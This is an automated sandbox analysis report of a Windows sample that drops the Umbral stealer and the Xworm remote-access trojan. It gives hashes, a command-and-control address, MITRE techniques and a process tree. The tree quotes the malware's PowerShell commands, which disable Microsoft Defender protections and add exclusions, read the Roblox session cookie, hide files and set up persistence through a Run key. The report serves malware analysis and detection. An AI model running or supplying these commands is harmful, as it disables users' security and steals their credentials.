umbral | dc7f8c7c39bb043da2c19a03504c499e0af367fefee810a8190c1119992e2248

Analysis

max time kernel
149s
max time network
158s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
23-02-2025 10:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

obxod266dev.exe
Size

329KB
MD5

31fc82eeaed45f2389b57ffb9d8f6ea2
SHA1

fd46d4e307b09a372a3bfc0d88b87eeccaf77912
SHA256

dc7f8c7c39bb043da2c19a03504c499e0af367fefee810a8190c1119992e2248
SHA512

418bca3b27a8354e559de8e1333ebc8ff42a5d4f07b42a0ec95775c9a52feb1d61a00006ceefef3be8e30dc07c0fb3123440413a2b16d8d9cc6e468cb9d5c962
SSDEEP

6144:3aDaK7MooumCpZSApAWl2IenY7YDlw+JmS1r8+CMCX:3LK7sk2IKYkp/mYPCX

Score

10^/10

umbral xworm discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

25.ip.gl.ply.gg:59054

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0009000000027e82-20.dat	family_umbral
behavioral4/memory/852-31-0x0000028BAD360000-0x0000028BAD3A0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x000a000000027e50-6.dat	family_xworm
behavioral4/memory/776-32-0x0000000000430000-0x000000000044A000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
568	powershell.exe
3200	powershell.exe
3412	powershell.exe
4852	powershell.exe
848	powershell.exe
1204	powershell.exe
4744	powershell.exe
732	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	obxod266dev.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation	obxod 266dev.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	obxod 266dev.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	obxod 266dev.exe

Executes dropped EXE 2 IoCs

pid	Process
776	obxod 266dev.exe
852	Umbral.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	obxod 266dev.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	discord.com
11	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4608	cmd.exe
232	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4948	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
232	PING.EXE

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
2208	wmic.exe
2208	wmic.exe
2208	wmic.exe
2208	wmic.exe
848	powershell.exe
848	powershell.exe
1204	powershell.exe
1204	powershell.exe
4744	powershell.exe
4744	powershell.exe
732	powershell.exe
732	powershell.exe
776	obxod 266dev.exe
852	Umbral.exe
4852	powershell.exe
4852	powershell.exe
3200	powershell.exe
3200	powershell.exe
3412	powershell.exe
3412	powershell.exe
4684	powershell.exe
4684	powershell.exe
3820	wmic.exe
3820	wmic.exe
3820	wmic.exe
3820	wmic.exe
3280	wmic.exe
3280	wmic.exe
3280	wmic.exe
3280	wmic.exe
1172	wmic.exe
1172	wmic.exe
1172	wmic.exe
1172	wmic.exe
568	powershell.exe
568	powershell.exe
4948	wmic.exe
4948	wmic.exe
4948	wmic.exe
4948	wmic.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	776	obxod 266dev.exe
Token: SeDebugPrivilege	852	Umbral.exe
Token: SeIncreaseQuotaPrivilege	2208	wmic.exe
Token: SeSecurityPrivilege	2208	wmic.exe
Token: SeTakeOwnershipPrivilege	2208	wmic.exe
Token: SeLoadDriverPrivilege	2208	wmic.exe
Token: SeSystemProfilePrivilege	2208	wmic.exe
Token: SeSystemtimePrivilege	2208	wmic.exe
Token: SeProfSingleProcessPrivilege	2208	wmic.exe
Token: SeIncBasePriorityPrivilege	2208	wmic.exe
Token: SeCreatePagefilePrivilege	2208	wmic.exe
Token: SeBackupPrivilege	2208	wmic.exe
Token: SeRestorePrivilege	2208	wmic.exe
Token: SeShutdownPrivilege	2208	wmic.exe
Token: SeDebugPrivilege	2208	wmic.exe
Token: SeSystemEnvironmentPrivilege	2208	wmic.exe
Token: SeRemoteShutdownPrivilege	2208	wmic.exe
Token: SeUndockPrivilege	2208	wmic.exe
Token: SeManageVolumePrivilege	2208	wmic.exe
Token: 33	2208	wmic.exe
Token: 34	2208	wmic.exe
Token: 35	2208	wmic.exe
Token: 36	2208	wmic.exe
Token: SeIncreaseQuotaPrivilege	2208	wmic.exe
Token: SeSecurityPrivilege	2208	wmic.exe
Token: SeTakeOwnershipPrivilege	2208	wmic.exe
Token: SeLoadDriverPrivilege	2208	wmic.exe
Token: SeSystemProfilePrivilege	2208	wmic.exe
Token: SeSystemtimePrivilege	2208	wmic.exe
Token: SeProfSingleProcessPrivilege	2208	wmic.exe
Token: SeIncBasePriorityPrivilege	2208	wmic.exe
Token: SeCreatePagefilePrivilege	2208	wmic.exe
Token: SeBackupPrivilege	2208	wmic.exe
Token: SeRestorePrivilege	2208	wmic.exe
Token: SeShutdownPrivilege	2208	wmic.exe
Token: SeDebugPrivilege	2208	wmic.exe
Token: SeSystemEnvironmentPrivilege	2208	wmic.exe
Token: SeRemoteShutdownPrivilege	2208	wmic.exe
Token: SeUndockPrivilege	2208	wmic.exe
Token: SeManageVolumePrivilege	2208	wmic.exe
Token: 33	2208	wmic.exe
Token: 34	2208	wmic.exe
Token: 35	2208	wmic.exe
Token: 36	2208	wmic.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeIncreaseQuotaPrivilege	848	powershell.exe
Token: SeSecurityPrivilege	848	powershell.exe
Token: SeTakeOwnershipPrivilege	848	powershell.exe
Token: SeLoadDriverPrivilege	848	powershell.exe
Token: SeSystemProfilePrivilege	848	powershell.exe
Token: SeSystemtimePrivilege	848	powershell.exe
Token: SeProfSingleProcessPrivilege	848	powershell.exe
Token: SeIncBasePriorityPrivilege	848	powershell.exe
Token: SeCreatePagefilePrivilege	848	powershell.exe
Token: SeBackupPrivilege	848	powershell.exe
Token: SeRestorePrivilege	848	powershell.exe
Token: SeShutdownPrivilege	848	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeSystemEnvironmentPrivilege	848	powershell.exe
Token: SeRemoteShutdownPrivilege	848	powershell.exe
Token: SeUndockPrivilege	848	powershell.exe
Token: SeManageVolumePrivilege	848	powershell.exe
Token: 33	848	powershell.exe
Token: 34	848	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
776	obxod 266dev.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2464 wrote to memory of 776	2464	obxod266dev.exe	83
PID 2464 wrote to memory of 776	2464	obxod266dev.exe	83
PID 2464 wrote to memory of 852	2464	obxod266dev.exe	84
PID 2464 wrote to memory of 852	2464	obxod266dev.exe	84
PID 852 wrote to memory of 2208	852	Umbral.exe	85
PID 852 wrote to memory of 2208	852	Umbral.exe	85
PID 776 wrote to memory of 848	776	obxod 266dev.exe	88
PID 776 wrote to memory of 848	776	obxod 266dev.exe	88
PID 776 wrote to memory of 1204	776	obxod 266dev.exe	91
PID 776 wrote to memory of 1204	776	obxod 266dev.exe	91
PID 776 wrote to memory of 4744	776	obxod 266dev.exe	93
PID 776 wrote to memory of 4744	776	obxod 266dev.exe	93
PID 776 wrote to memory of 732	776	obxod 266dev.exe	95
PID 776 wrote to memory of 732	776	obxod 266dev.exe	95
PID 852 wrote to memory of 5044	852	Umbral.exe	97
PID 852 wrote to memory of 5044	852	Umbral.exe	97
PID 852 wrote to memory of 4852	852	Umbral.exe	99
PID 852 wrote to memory of 4852	852	Umbral.exe	99
PID 852 wrote to memory of 3200	852	Umbral.exe	101
PID 852 wrote to memory of 3200	852	Umbral.exe	101
PID 852 wrote to memory of 3412	852	Umbral.exe	103
PID 852 wrote to memory of 3412	852	Umbral.exe	103
PID 852 wrote to memory of 4684	852	Umbral.exe	105
PID 852 wrote to memory of 4684	852	Umbral.exe	105
PID 852 wrote to memory of 3820	852	Umbral.exe	107
PID 852 wrote to memory of 3820	852	Umbral.exe	107
PID 852 wrote to memory of 3280	852	Umbral.exe	109
PID 852 wrote to memory of 3280	852	Umbral.exe	109
PID 852 wrote to memory of 1172	852	Umbral.exe	111
PID 852 wrote to memory of 1172	852	Umbral.exe	111
PID 852 wrote to memory of 568	852	Umbral.exe	113
PID 852 wrote to memory of 568	852	Umbral.exe	113
PID 852 wrote to memory of 4948	852	Umbral.exe	115
PID 852 wrote to memory of 4948	852	Umbral.exe	115
PID 852 wrote to memory of 4608	852	Umbral.exe	117
PID 852 wrote to memory of 4608	852	Umbral.exe	117
PID 4608 wrote to memory of 232	4608	cmd.exe	119
PID 4608 wrote to memory of 232	4608	cmd.exe	119

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5044	attrib.exe

C:\Users\Admin\AppData\Local\Temp\obxod266dev.exe
"C:\Users\Admin\AppData\Local\Temp\obxod266dev.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Users\Admin\AppData\Roaming\obxod 266dev.exe
  "C:\Users\Admin\AppData\Roaming\obxod 266dev.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\obxod 266dev.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'obxod 266dev.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:732
- C:\Users\Admin\AppData\Roaming\Umbral.exe
  "C:\Users\Admin\AppData\Roaming\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2208
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:5044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4684
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3820
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3280
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:568
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious behavior: EnumeratesProcesses
    PID:4948
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d6433295bb05be1264bc562056f03a07

SHA1
bbed90d704780e17e6abb0171bab054af46b7f71

SHA256
ce021ebbf22dcbdc1a99ef58a2614725914e2d4789d43df7a45b8bc6f4060bf5

SHA512
7acf1cf6d3c676d4dd94155e02c9b201bddcffb6f3729aa8cb33186e5e46711f26f34bec58185ee3fa70b43624619ac3cd29f3bd2dce9af18daf987dcc0cdadd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
49c8deecafaccdc2a119c940e4c104de

SHA1
69eb12fcc5fb118aea527ff68a299520e9fa6172

SHA256
d9d3de25a8c83cd5528bf9b61db418cfca5800baead237cc20ca1e08d598f3d7

SHA512
6373f4c8dfe3ae75aa743a7db9160ba6578f5dfea3adbf6450bb6caa3e7abd37e1b022193f3c73650adf5eee6f0cb837f8c750862fcd4e1ca713b4899007f723

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97e62e1aad5a68c83b00fd2d6926c4e0

SHA1
42c8068d4c16af6eb6810753a2aa3c48186e1a61

SHA256
bf2df5d2a7ac3f6be83ede33a2a1df99cb76a3bddae9d3e7d4b8cef8f74d2c02

SHA512
22ca3df949c016856c9fa50feba543d585ac0b8a75aadbdc65f8a4d54948a25602f1484f2e99256f0ec8fb5ca15f276bd3f24be6c0dfceb541109f6afdb6a407

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
44e35225596786eb1494369bfa1dfb76

SHA1
24d57b30403365a060f91219a5db587a88ab1e55

SHA256
342e33683a5fc6016936c7a1303c4e7d0af06fb33d6d7e15d6a92a3949464cf0

SHA512
043309da29f30549960bd3968d57dd03921b16028d30292e4d7b7754d8a000b05180c52813b564782c7458574311db9f6a9f734a3156e9dad70709bbe22fe63b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af1cc13f412ef37a00e668df293b1584

SHA1
8973b3e622f187fcf484a0eb9fa692bf3e2103cb

SHA256
449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037

SHA512
75d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aea5cb7f27e89fb59360d49b1a005291

SHA1
32483bba5b0cf77c9aa13139ba1c8e9397ffab75

SHA256
50a967b462520910e3283fe2b7d1d319746ae4bbc86fa02fe4a3b76c4331e161

SHA512
e3a80d49e2089bf9702ba12abc58b26a8ef26390efe6c84b687525ed3c0e30792ddd5ab3f68a22d8229caff4f542879e936e218d81237571475671095bdf1aae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b49bbe86f59b088238097b26fbee44e

SHA1
f896406a2d11c5e187214e9abd56d475acb57bc9

SHA256
771fb2b83d66c756a1773a0fd609de0af26471a74cf5b014425967ae3ccf9fdc

SHA512
a330a1f69dbc4ba24708efff7cdb6b508596a41b6423c0da7b79d1925413821f3eb22e5fcfcf56956619be6047d22ece5c0e6e28dd01a048f634208893cfd369

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94546bfbf6436b2f4d1ccb465df8dbad

SHA1
f4858e9ab1ed212e60eae23bc2cc229866bacbd0

SHA256
f9a41c2e27504634325e49569e3e501ab55045be6b2d3d9ed578f574b89b8c66

SHA512
9228ee2f713679dabc31262e87c553cad2e79a206c781cd03b8331d0dd64a9df64cb1ab571ad08b4ac83aac35897d34858b1660be6c08a49964be56395098436

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nhn1bn55.24p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Umbral.exe

Filesize
232KB

MD5
e486d8aafa368a43a56987dd4d80aa75

SHA1
8851fe89928a47a58b50348d9a4458f24e2725f9

SHA256
596ac7d2aa525ceb7b82aec1e6376d34f36649f028de442fb0a0021e380db136

SHA512
abe413e1277c0ac103778822dcd3f6b03f315fad83731af10284a68fca8ecfa2d2c6b9d9c3e0ec55803a2b31d03ae9c863c430eba23954ccc5f82b2a6d21e573

Download Submit
C:\Users\Admin\AppData\Roaming\obxod 266dev.exe

Filesize
80KB

MD5
3598f860aacfe53b00c305715a6c7b2f

SHA1
70640b2e8a71017cdf5fb8e91fe0b065f89a064b

SHA256
b4b8385381c3bb23d821f179a73ff19083d15f7cc6e1c9cc2235da3c382db241

SHA512
0b2bfa9e701ba126acb6bf9b9b5df26e8558a59708659ec2981173267d277f44e6b6575f1ceb945a86705796ea8f50c5cd1617ee45fdaabdc68af9b2022e654c

Download Submit
memory/776-32-0x0000000000430000-0x000000000044A000-memory.dmp

Filesize
104KB

Download
memory/776-85-0x00007FFA8C840000-0x00007FFA8D302000-memory.dmp

Filesize
10.8MB

Download
memory/776-33-0x00007FFA8C840000-0x00007FFA8D302000-memory.dmp

Filesize
10.8MB

Download
memory/776-87-0x00007FFA8C840000-0x00007FFA8D302000-memory.dmp

Filesize
10.8MB

Download
memory/848-44-0x00000258EC5D0000-0x00000258EC5F2000-memory.dmp

Filesize
136KB

Download
memory/852-34-0x00007FFA8C840000-0x00007FFA8D302000-memory.dmp

Filesize
10.8MB

Download
memory/852-86-0x00007FFA8C840000-0x00007FFA8D302000-memory.dmp

Filesize
10.8MB

Download
memory/852-111-0x0000028BC7A80000-0x0000028BC7AF6000-memory.dmp

Filesize
472KB

Download
memory/852-112-0x0000028BC7A30000-0x0000028BC7A80000-memory.dmp

Filesize
320KB

Download
memory/852-113-0x0000028BC7B00000-0x0000028BC7B1E000-memory.dmp

Filesize
120KB

Download
memory/852-31-0x0000028BAD360000-0x0000028BAD3A0000-memory.dmp

Filesize
256KB

Download
memory/852-138-0x0000028BC7A20000-0x0000028BC7A2A000-memory.dmp

Filesize
40KB

Download
memory/852-139-0x0000028BC7D40000-0x0000028BC7D52000-memory.dmp

Filesize
72KB

Download
memory/852-159-0x00007FFA8C840000-0x00007FFA8D302000-memory.dmp

Filesize
10.8MB

Download
memory/2464-0-0x00007FFA8C843000-0x00007FFA8C845000-memory.dmp

Filesize
8KB

Download
memory/2464-1-0x0000000000560000-0x00000000005B8000-memory.dmp

Filesize
352KB

Download